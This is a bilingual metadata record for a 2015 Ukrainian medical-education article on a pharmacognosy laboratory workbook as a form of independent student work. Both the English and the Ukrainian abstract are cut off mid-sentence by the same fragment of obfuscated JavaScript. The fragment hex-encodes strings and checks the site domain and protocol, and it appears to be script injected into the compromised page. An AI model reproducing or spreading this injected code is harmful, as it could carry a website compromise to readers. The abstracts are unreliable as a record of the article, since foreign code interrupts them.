Запис Детальніше

LABARATORY HAND-BOOK OF PHARMACOGNOSY AS A ONE OF THE STUDENTS INDEPENDENT WORK

Наукові журнали Тернопільського державного медичного університету імені І.Я.Горбачевського

Переглянути архів Інформація
 
 
Поле Співвідношення
 
Title LABARATORY HAND-BOOK OF PHARMACOGNOSY AS A ONE OF THE STUDENTS INDEPENDENT WORK
РОБОЧИЙ ЖУРНАЛ З ФАРМАКОГНОЗІЇ ЯК ОДИН iЗ ВИДІВ САМОСТІЙНОЇ РОБОТИ СТУДЕНТІВ
 
Creator Cholak, I. S.; Тернопільський державний медичнрй університет імені І.Я. Горбачевського
 
Subject




 
Description Most scientists consider independent work as an essential component of educational process, which involves the integration of different types of individual and collective educational activities. Independent work using the hand-book is a critical component of the educational process, which is carried out as in the classroom, extracurricular classes, without a teacher, and under his leadership. The main advantages of hand-book are: mastering certain knowledge, skills, consolidation and systematization of theoretical knowledge during training; targeting students for independent critical thinking and search activities; printed basis of working material allows to increase productivity of classwork, to solve more tasks at the same time.// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "ojs.tdmu.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e
Більшість науковців розглядає самостійну роботу як найважливіший компонент педагогічного процесу, що передбачає інтеграцію різних видів індивідуальної та колективної навчальної діяльності. Самостійна робота з використанням робочого журналу є одним з найважливіших компонентів освітнього процесу, яка здійснюється як під час аудиторних,позааудиторних занять, без участі викладача, так і під його безпосереднім керівництвом. Основними перевагами робочого журналу є засвоєння певних знань, умінь, навичок, закріплення та систематизація теоретичних знань, отриманиху процесі навчання; націлювання студентів на самостійне критичне мислення та пошукову діяльність; друкована основа робочого матеріалу надає можливість підвищити продуктивність заняття, розв’язати більшу кількість завдань за один і той же час.// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "ojs.tdmu.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e
 
Publisher Ternopil State Medical University
 
Contributor

 
Date 2015-12-17
 
Type info:eu-repo/semantics/article
info:eu-repo/semantics/publishedVersion



 
Format application/pdf
 
Identifier http://ojs.tdmu.edu.ua/index.php/med_osvita/article/view/5396
10.11603/me.v0i4.5396
 
Source Medical Education; № 4 (2015)
Медична освіта; № 4 (2015)
2414-5998
1681-2751
10.11603/me.v0i4
 
Language ukr
 
Relation http://ojs.tdmu.edu.ua/index.php/med_osvita/article/view/5396/4960
 
Coverage





 
Rights ##submission.copyrightStatement##